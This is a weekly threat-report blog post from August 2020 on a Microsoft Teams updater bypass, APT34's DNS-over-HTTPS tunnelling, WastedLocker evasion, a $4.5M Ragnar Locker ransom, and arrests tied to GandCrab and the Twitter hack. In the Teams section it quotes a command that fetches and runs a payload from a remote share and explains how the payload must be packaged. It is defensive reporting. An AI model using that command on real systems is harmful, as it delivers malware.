Money takes flight in $4.5 million ransom payment

We’re back for another usually weekly threat report. There’s a lot to cover (isn’t there always?), so we’ll get right into it:

• Attackers adopt new techniques and put them to use
• $10m ransomware demand results in a 45% negotiated discount
• New arrests

New LOL technique

On August 5th, 2020, researchers released details on an improperly patched Living Off the Land technique from 2019 that could allow threat actors to abuse the Microsoft Teams updater and install malware from a remote server.

The Microsoft Team patch didn’t fully address the issue and could still allow threat actors to exploit shared access in the local UNC format: \\server\.

To exploit the shared access, an attacker still needs to place a malicious file in an open shared folder and then access the payload from that share through the targeted computer.

According to Trustwave, the attacker can create a remote share using a Samba server that allows remote public access. Then, the attacker can download the remote payload and execute it from Microsoft Teams Updater “Update.exe’’ using the following command: Update.exe -update=\\remoteserver\payloadFolder.

Microsoft Teams handles installation and updating routines with open-source project Squirrel, which relies on the NuGet package manager to create the necessary files. For that design, the payload needs to be named “squirrel.exe” and sit in a particular NUPKG file to bypass the current mitigations applied on Microsoft Teams. Additionally, a file with the metadata of the fake Microsoft Teams release is required.

Trustwave reported their findings to Microsoft and stated that they cannot restrict the SMB source because their customers rely on it.

It’s recommended that organizations monitor their logs for “update.exe” command lines from suspicious connections. Anomalies can be found by analyzing the size of “squirrel.exe” to identify if the legitimate executable was modified.

APT34 adopts DNS over HTTPS

An Iranian-state Advanced Persistent Threat (APT) group, dubbed “APT34,” also known as “OilRig,” “Cobalt Gypsy,” “Timberworm,” and “Twisted Kitten,” was the first APT known to use the DNS –over HTTPS (DoH) protocol for command and control (C2) communications and lateral movement within networks.

This campaign was observed in May 2020 by Vincente Diaz, a malware researcher at Kaspersky, after observing attacks deploying the DoH protocol. However, it’s only being reported now.

In these intrusions, APT34 was identified using a tool called “DNSExfiltrator,” which can perform exfiltration over DoH.

DNSExfiltrator is an open-source project available on GitHub that creates covert communication channels by funneling data and hiding it inside non-standard protocols.

APT34 most likely used this method to avoid detection since DoH is a new protocol that not all security products are capable of monitoring, and it’s encrypted by default while standard DNS is cleartext.

WastedLocker abusing Windows memory management

On August 4, 2020, “WastedLocker” ransomware was observed abusing the Windows memory management feature to bypass security software and prevent the detection of its malicious activities.

The WastedLocker infection chain starts by leveraging Windows Cache. To bypass detection, WastedLocker opens a file, reads the file into the Windows Cache Manager, and closes the original file.

From there, the ransomware will encrypt the file’s content stored in the cache. This method effectively bypasses a security solution’s ransomware protection modules and allows WastedLocker to encrypt all the victim’s files.

WastedLocker ransomware first emerged in May 2020. The threat actor behind WastedLocker is Evil Corp, who also distributes Dridex malware. Evil Corp uses a combination of custom malware, customized versions of commodity tools, and off-the-shelf capabilities – some of which have been consistent with previous activity by the threat actor.

Although WastedLocker’s delivery mechanisms consistently include SocGhoulish hosted on a compromised site, Evil Corp used a version of Cobalt Strike as the second stage, instead of the previously used Dridex.

Evil Corp isn’t known to exfiltrate victim data from encrypted systems, but there’s opportunity to do so. They could decide to add exfiltration and extortion to ensure big payouts, like Ragnar Locker and other ransomware leakers are doing. We predicted this evolution in our 2020 MSP threat report.

Travel company pays 4.5M ransom

On July 31, 2020, @JAMESWT_MHT shared an instance of Ragnar Locker malware. This sample of Ragnar Locker targets the Carlson Wagonlit Travel company (CWT).

Sandbox analysis of samples shows behavior like deleting shadow volume copies, backups, and volume snapshots using Windows Management Instrumentation (WMI) and Volume Shadow Copy Service processes. After all the backups are deleted, the malware will then modify the bootloader configuration using the Boot Configuration Data Editor.

The configuration will be set to disable recovery mode, ignore all boot errors, and disable advanced recovery options.

@JAMESWT_MHT also shared screenshots of a Bitcoin transaction worth 4.5M USD and a chat room conversation between CWT and the attackers, documenting that the ransom payment was negotiated from 10M USD down to approximately 4.5M USD.

Busted

Four notable cyber-criminals related to GandCrab and the Twitter hack were busted over the last week.

On Jul 30, 2020, an operator of the GandCrab ransomware-as-a-business (RaaS) was arrested under Art. 354 of the Criminal Code of Belarus for the distribution of malicious programs across various countries, including India, the USA, Ukraine, Great Britain, Germany, France, Italy, and Russia.

The identity of the threat actor from Gomel, a city in southeastern Belarus, was identified through interaction with the authorities of Romania and the UK. The threat actor’s identity hasn’t been publicly revealed; however, the Ministry of Internal Affairs in Belarus stated that the threat actor is 31-years old.

The threat actor targeted the victims through a malicious spam campaign of PDF files that contained the GandCrab ransomware. When the victims opened the PDF file, the ransomware would be executed and begin encrypting their files. Then, the impacted victims were asked to pay a ransom demand ranging from $400 to $1500 in order to retrieve their compromised files.

GandCrab retired on June 1, 2019, after generating more than $2 billion in ransom payments and personally earning $150 million per year.

On July 31, 2020, a 17-year-old and two other 19 and 22-year-old individuals were reportedly arrested by the authorities for being allegedly behind the Twitter cryptocurrency scam incident that occurred on July 15, 2020. According to the US Department of Justice, the identity of the threat actors was identified as Graham Clark, Mason Sheppard aka “Chaewon,” and Nima Fazeli aka “Rolex.”

The FBI investigation believed that Clark was the mastermind of the incident and gained access to the Twitter customer service portal by using a social engineering attack to convince a Twitter employee that he was a co-worker in the IT department. From there, the Twitter employee provided the credentials to Clark allowing him to access the customer service portal.

According to the US Federal Bureau of Investigation, Sheppard and Fazeli allegedly operated as middlemen for the Twitter incident. The two worked alongside Clark, who is believed to be connected to the moniker “Kirk#5270,” and who allegedly gained access to the internal network of Twitter.

Twitter later admitted that the attackers compromised employee accounts with access to internal tools, allowing them to gain unauthorized access to the targeted profiles. Twitter also revealed that some of its employees were targeted using a spear-phishing attack through misleading certain employees and exploiting human vulnerabilities to gain access to their internal systems.

At the time of writing, the FBI stated that the investigation is still ongoing to identify additional suspects involved in the Twitter incident. Additionally, the FBI stated that the aforementioned threat actors were in custody.

We'd love to hear your thoughts. Find us on Twitter, LinkedIn or write in to hello@perchsecurity.com

Next: North Korea gets part-time job in ransomware